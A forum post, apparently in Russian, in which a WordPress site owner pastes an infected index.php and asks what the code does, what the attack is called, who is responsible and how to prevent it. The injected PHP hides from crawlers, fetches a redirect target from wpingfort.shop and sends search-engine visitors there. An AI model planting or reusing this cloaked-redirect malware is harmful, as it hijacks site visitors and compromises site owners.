Сайт на вордпресс, лежит на рег хостинге.
Index.php теперь выглядит следующим образом:
<?php
error_reporting(0);
set_time_limit(0);
$ref=$_SERVER['HTTP_REFERER'];
$userhttp=$_SERVER["HTTP_USER_AGENT"];
$search='.aol.|.astronaut.at|.austronaut.at|.dastelefonbuch.de|.exalead.|.excite.|.sm.cn|.zoek.nl|1.cz|1881.no|2gis.ru|Keywords|Sozluk.com|abacho.|abcsolk.no|acoon.de|alexa.com|aliceadsl.fr|all.by|alltheweb.com|altavista.|amazon.com|apollo.lv/portal/search/|apollo7.de|apontador.com.br|arama.com|arcor.de|ariadna.elmundo.es|arianna.com|ask.|askkids.com|badoo.com|baidu.com|be-fr.altavista.com|be-nl.altavista.com|bebo.com|bing.com|bingj.com|blackplanet.com|blekko.com|blogdigger.com|blogpulse.com|blogs.icerocket.com|busca.orange.es|busca.uol.com.br|buscador.terra|buzznet.com|centrum.cz|cercato.it|charter.net|class.hit-parade.com|classmates.com|clusty.com|cnn.com|crawler.com|cuil.com|darkoogle.com|dasoertliche.de|delicious.com|digg.com|disq.us|disqus.com|dizionario.it.msn.com|dmoz.org|dogpile.com|donanimhaber.com|douban.com|duckduckgo.com|ecosia.org|eniro.se|eo.st|eu.ixquick.com|eurip.com|euroseek.com|everyclick.com|facebook.|fastweb.it|fb.me|find.tdc.dk|finderoo.com|fireball.de|firstsfind.com|fixsuche.de|flickr.com|flix.de|flixster.com|forestle.mobi|forestle.org|forums.whirlpool.net.au|fotolog.com|foursquare.com|fr2.rpmfind.net|francite.com|fresh-weather.com|friendfeed.com|friendsreunited.com|friendster.com|gaiaonline.com|gais.cs.ccu.edu.tw|geni.com|geona.net|getpocket.com|gigablast.com|github.com|global.cyworld.com|gnadenmeer.de|go.mail.ru|gomeo.com|google.|googleearth.|googleusercontent.com|goyellow.de|gulesider.no|habbo.com|hi5.com|highbeam.com|hit-parade.com|hledani.tiscali.cz|hocam.com|holmes.ge|hooseek.com|hotbot.com|hyves.nl|icq.com|identi.ca|ilse.nl|inbox.com|inci.sozlukspot.com|incisozluk.cc|incisozluk.com|incredimail.|infospace.com|instagram.|instela.com|itusozluk.com|ixquick.com|ixquick.de|jungle-spider.de|junglekey.|jyxo.1188.cz|kataweb.it|kununu.com|kvasir.no|lastfm.ru|latne.lv|lemoteur.|libero.it|link.2gis.ru|linkedin.com|listings.altavista.com|live.com|liveinternet.ru|livejournal.ru|lnkd.in|lo.st|looksmart.com|lycos.com|maailm.com|mail.ru|mamma.com|mamma75.mamma.com|marktplaats.nl|meinestadt.de|meta.rrzn.uni-hannover.de|meta.ua|metacrawler.|metager.de|metager2.de|mister-wong.|mixi.jp|moikrug.ru|monstercrawler.com|mozbot.|msnbc.msn.com|multiply.com|my.mail.ru|myheritage.com|mylife.ru|myspace.com|myyearbook.com|najdi.si|neti.ee|netlog.com|news.ycombinator.com|nigma.ru|nk.pl|nova.rambler.ru|odnoklassniki.ru|ok.ru|online.no|orkut.com|otsing.delfi.ee|paper.li|paperball.de|pesquisa.|pinterest.com|plaxo.com|plazoo.com|poisk.ru|pricerunner.co.uk|qbyrd.com|qualigo.|quark.sm.cn|quora.com|qwant.com|qzone.qq.com|reddit.com|renren.com|req.-hit-parade.com|rpmfind.net|search-dyn.tiscali.it|search-intl.netscape.com|search-results.com|search.|search1-1.free.fr|search1-2.free.fr|searchalot.com|searchatlas.centrum.cz|searchcanvas.com|searches.globososo.com|searchresults.verizon.com|searchthis.com|searchy.co.uk|serach.comcast.net|sharelook.fr|skynet.be|skyrock.com|sm.aport.ru|smart.delfi.lv|so.360.cn|so.com|so.m.sm.cn|sonico.com|soso.com|sosodesktop.com|sougou.com|sourceforge.net|sourtimes.org|stackoverflow.com|start.facemoods.com|start.iplay.com|startsiden.no|studivz.net|stumbleupon.com|suche.aolsvc.de|suche.freenet.de|suche.gmx.net|suche.info|suche.web.de|suchmaschine.com|suchnase.de|szukaj.onet.pl|szukaj.wp.pl|t-online.de|t.umblr.com|tagged.com|talktalk.co.uk|taringa.net|technorati.com|teoma.com|tixuma.de|toile.com|toolbarhome.com|trouvez.com|trovarapido.com|tuenti.com|tumblr.com|twingly.com|twitter.com|uludagsozluk.com|ulusozluk.com|url.org|us.ixquick.com|verden.abcsok.no|viadeo.com|vimeo.com|vinden.nl|vindex.nl|virgilio.it|vk.com|vkontakte.ru|vkrugudruzei.ru|vshare.toolbarhome.com|walhello.|wayn.com|web.canoe.ca|web.gougou.com|web.nl|web.skype.com|web.toile.com|web.volny.cz|web.whatsapp.com|webcrawler.com|webfetch.com|weborama.com|weeworld.com|weibo.com|witch.de|x-recherche.com|xanga.com|xing.com|yahoo.|yandex.|yasni.|yatedo.|yougoo.fr|youtu.be|youtube.com|ys.mirostart.com|yz.m.sm.cn|zapmeta.|zhongsou.com|zoeken.nl|zoohoo.cz';
$b1223='Abonti|aggregator|AhrefsBot|Aport|asterias|Baiduspider|bingbot|binance|BackupLand|Barkrowler|BDCbot|Birubot|BLEXBot|BUbiNG|BuiltBotTough|Bullseye|BunnySlippers|Butterfly|CamontSpider|CCBot|Cegbfeieh|CheeseBot|CherryPicker|coccoc|CopyRightCheck|cosmos|crawler|Crescent|CyotekWebCopy|CyotekHTTP|DataForSeoBot|DeuSu|discobot|DittoSpyder|DnyzBot|DomainCrawler|DotBot|DownloadNinja|dcrawl|EasouSpider|EmailCollector|EmailSiphon|EmailWolf|EroCrawler|Exabot|ExtractorPro|Ezooms|facebookexternalhit|FairShare|Fasterfox|FeedBooster|Foobot|Genieo|GetIntentCrawler|Gigabot|GrapeshotCrawler|Go-http-client|Harvest|hloader|HTTrack|humanlinks|HybridBot|ieautodiscovery|Incutio|InfoNaviRobot|InternetSeer|ips-agent|IstellaBot|JamesBOT|JennyBot|JS-Kit|Jooblebot|k2spider|Kenjin|kmSearchBot|larbin|LexiBot|Linguee|LinkExchanger|LinkextractorPro|linko|LinkWalker|LinkpadBot|lmspider|LNSpiderguy|ltx71|lwp-trivial|Mail.RU_Bot|magpie|MataHari|MaxPointCrawler|MegaIndex|memoryBot|MIIxpc|Mippin|MisterPiX|MJ12bot|MLBot|moget|MSIECrawler|msnbot|msnbot-media|NetAnts|NetcraftSurveyAgent|NICErsPRO|NjuiceBot|NPBot|Nutch|OfflineExplorer|OLEcrawler|Openfind|openstat.ru|panscient|PostRank|PetalBot|ProWebWalker|ptd-crawler|Purebot|PycURL|QueryNMetasearch|RepoMonkey|Riddler|RMA|Scrapy|SemrushBot|serf|SeznamBot|SISTRIX|SiteBot|SiteSnagger|Serpstat|Slurp|SnapPreviewBot|Sogou|Soup|SpankBot|spanner|spbot|Spinn3r|SpyFu|statdom.ru|SputnikBot|suggybot|SurveyBot|suzuran|Teleport|Telesoft|TheIntraformant|TheNomad|TightTwatBot|Titan|True_Robot|ttCrawler|turingos|TurnitinBot|TOBBOT|UbiCrawler|UnisterBot|URLyWarning|VCI|Vedma|Voyager|WBSearchBot|WebAuto|WebBandit|WebDataStats|WebCopier|WebEnhancer|WebmasterWorldForumBot|WebReaper|webprosbot|WebSauger|WebStripper|WebZip|Wotbox|YottosBot|Yeti|YandexFavicons|Zao|Zeus|ZyBORG|python\-requests|ALittle\ Client|Apache\-HttpClient';
$start=true;
$dearchg=false;
$oct=explode('|',$b1223);
foreach($oct as $vald){if(strpos($userhttp,$vald) !== FALSE){setcookie('GA_r',1,time()+259200,'/');$start=false;break;}};
$oct=explode('|',$search);
foreach($oct as $vald){if(strpos($ref,$vald) !== FALSE){$dearchg=true;break;}};
if(!$_COOKIE["GA_r"] && $start === true && $dearchg === true){
$filename = md5("index.php");
$path = dirname(__FILE__);
if(file_exists($path."/".$filename)) {
$timer = filemtime($path."/".$filename);
} else {
$timer = time()-130;
}
$res = '';
if(time()-120 >= $timer){
if(function_exists('curl_version')){
$curl = curl_init();
curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
curl_setopt($curl, CURLOPT_URL, 'http://wpingfort.shop/');
curl_setopt($curl, CURLOPT_TIMEOUT, 6);
$res = curl_exec($curl);
curl_close($curl);
}
if($res == ''){
$res = file_get_contents('http://wpingfort.shop/');
}
file_put_contents($path."/".$filename, $res);
} else {
$res = file_get_contents($path."/".$filename);
}
setcookie('GA_r' , 1, time() + 259200, '/');
header('Location: '. $res);
exit;
}
/**
* Front to the WordPress application. This file doesn't do anything, but loads
* wp-blog-header.php which does and tells WordPress to load the theme.
*
* @package WordPress
*/
/**
* Tells WordPress to load the WordPress theme and output it.
*
* @var bool
*/
define( 'WP_USE_THEMES', true );
/** Loads the WordPress Environment and Template */
require __DIR__ . '/wp-blog-header.php';
Возможно ещё что-то изменили в других папках(скорее всего).
Несколько вопрос в связи с текущей ситуацией:
1) что происходит в файле?
2) как официально называется такой тип взлома?
3) это ответственность хостинга или разработчика сайта?
4) как предовтратить повторение подобного в будущем(после восстановления сайта)?
